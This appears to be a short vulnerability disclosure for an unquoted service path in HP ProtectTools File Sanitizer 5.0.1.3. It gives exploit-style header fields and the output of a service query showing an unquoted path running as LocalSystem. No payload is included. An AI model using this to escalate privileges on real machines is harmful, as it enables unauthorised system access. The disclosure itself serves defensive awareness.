File Sanitizer for HP ProtectTools version 5.0.1.3 suffers from an unquoted service path vulnerability.
8ce6b10450a1d248fc6df2fe1a7d5f30
#Exploit Title: File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2022-02-14
#Vendor : Hewlett-Packard(HP)
#Version : File Sanitizer for HP ProtectTools 5.0.1.3
#Vendor Homepage : http://www.hp.com
#Tested on OS: Windows 7 Pro
#Analyze PoC :
==============
C:\>sc qc HPFSService
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: HPFSService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Hewlett-Packard\File
Sanitizer\HPFSService.exe
GRUPO_ORDEN_CARGA : File System
ETIQUETA : 0
NOMBRE_MOSTRAR : File Sanitizer for HP ProtectTools
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem